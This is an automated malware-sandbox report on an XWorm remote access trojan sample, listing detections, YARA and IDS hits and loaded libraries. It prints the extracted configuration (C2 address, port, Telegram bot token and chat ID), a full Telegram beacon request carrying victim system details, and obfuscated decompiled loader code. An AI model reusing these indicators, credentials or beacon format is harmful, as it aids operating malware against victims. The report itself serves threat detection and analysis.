Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2ehwX6LWt3.exe

Overview

General Information

Sample name:2ehwX6LWt3.exe
renamed because original name is a hash value
Original sample name:e70aace0217f5661dbce366d36a9bfda8cd4d2b29bb39f71a09ef81c76fa1bc5.exe
Analysis ID:1562434
MD5:fc95456f5963c777b21445a4b9855903
SHA1:8c08e64bdd1d4840d9d0fe5584d6da08ed970ce8
SHA256:e70aace0217f5661dbce366d36a9bfda8cd4d2b29bb39f71a09ef81c76fa1bc5
Tags:89-40-31-232exeuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 2ehwX6LWt3.exe (PID: 2656 cmdline: "C:\Users\user\Desktop\2ehwX6LWt3.exe" MD5: FC95456F5963C777B21445A4B9855903)
  • cleanup
{"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
2ehwX6LWt3.exeJoeSecurity_XWormYara detected XWormJoe Security
    2ehwX6LWt3.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      2ehwX6LWt3.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xfc48:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        00000001.00000000.2179937963.0000000000822000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000001.00000000.2179937963.0000000000822000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x109da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x10a77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x10b8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xfa48:$cnc4: POST / HTTP/1.1
          Process Memory Space: 2ehwX6LWt3.exe PID: 2656JoeSecurity_XWormYara detected XWormJoe Security
            Process Memory Space: 2ehwX6LWt3.exe PID: 2656JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              SourceRuleDescriptionAuthorStrings
              1.0.2ehwX6LWt3.exe.820000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                1.0.2ehwX6LWt3.exe.820000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  1.0.2ehwX6LWt3.exe.820000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xfc48:$cnc4: POST / HTTP/1.1
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T15:36:47.841927+010028536851A Network Trojan was detected192.168.2.649720149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 2ehwX6LWt3.exeAvira: detected
                  Source: 00000001.00000002.4661828510.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
                  Source: 2ehwX6LWt3.exeReversingLabs: Detection: 81%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 2ehwX6LWt3.exeJoe Sandbox ML: detected
                  Source: 2ehwX6LWt3.exeString decryptor: 89.40.31.232
                  Source: 2ehwX6LWt3.exeString decryptor: 1717
                  Source: 2ehwX6LWt3.exeString decryptor: <Xwormmm>
                  Source: 2ehwX6LWt3.exeString decryptor: 28Nov2024
                  Source: 2ehwX6LWt3.exeString decryptor: USB.exe
                  Source: 2ehwX6LWt3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49720 version: TLS 1.2
                  Source: 2ehwX6LWt3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:49720 -> 149.154.167.220:443
                  Source: Malware configuration extractorURLs: 89.40.31.232
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 2ehwX6LWt3.exe, type: SAMPLE
                  Source: Yara matchFile source: 1.0.2ehwX6LWt3.exe.820000.0.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.6:49736 -> 89.40.31.232:1717
                  Source: global trafficHTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A76B6983BF380F8767E2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Y5P36%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: global trafficHTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A76B6983BF380F8767E2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Y5P36%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: 2ehwX6LWt3.exe, 00000001.00000002.4661828510.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: 2ehwX6LWt3.exeString found in binary or memory: https://api.telegram.org/bot
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49720 version: TLS 1.2
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  Operating System Destruction

                  barindex
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Source: 2ehwX6LWt3.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 1.0.2ehwX6LWt3.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000001.00000000.2179937963.0000000000822000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeCode function: 1_2_00007FFD341F8C621_2_00007FFD341F8C62
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeCode function: 1_2_00007FFD341F0E001_2_00007FFD341F0E00
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeCode function: 1_2_00007FFD341F7EB61_2_00007FFD341F7EB6
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeCode function: 1_2_00007FFD341F499D1_2_00007FFD341F499D
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeCode function: 1_2_00007FFD341F49FD1_2_00007FFD341F49FD
                  Source: 2ehwX6LWt3.exe, 00000001.00000000.2179967062.0000000000836000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRaw.exe4 vs 2ehwX6LWt3.exe
                  Source: 2ehwX6LWt3.exeBinary or memory string: OriginalFilenameRaw.exe4 vs 2ehwX6LWt3.exe
                  Source: 2ehwX6LWt3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2ehwX6LWt3.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 1.0.2ehwX6LWt3.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000001.00000000.2179937963.0000000000822000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 2ehwX6LWt3.exe, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2ehwX6LWt3.exe, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2ehwX6LWt3.exe, jK41xlYzptzDvBwid77hpLBxe.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 2ehwX6LWt3.exe, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.csBase64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/2
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeMutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo
                  Source: 2ehwX6LWt3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 2ehwX6LWt3.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 2ehwX6LWt3.exeReversingLabs: Detection: 81%
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: 2ehwX6LWt3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 2ehwX6LWt3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: 2ehwX6LWt3.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 2ehwX6LWt3.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 2ehwX6LWt3.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
                  Source: 2ehwX6LWt3.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
                  Source: 2ehwX6LWt3.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeCode function: 1_2_00007FFD341F00BD pushad ; iretd 1_2_00007FFD341F00C1
                  Source: 2ehwX6LWt3.exe, lYfWlfT3r7Vqz88tbfAuCjKRe.csHigh entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
                  Source: 2ehwX6LWt3.exe, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
                  Source: 2ehwX6LWt3.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.csHigh entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 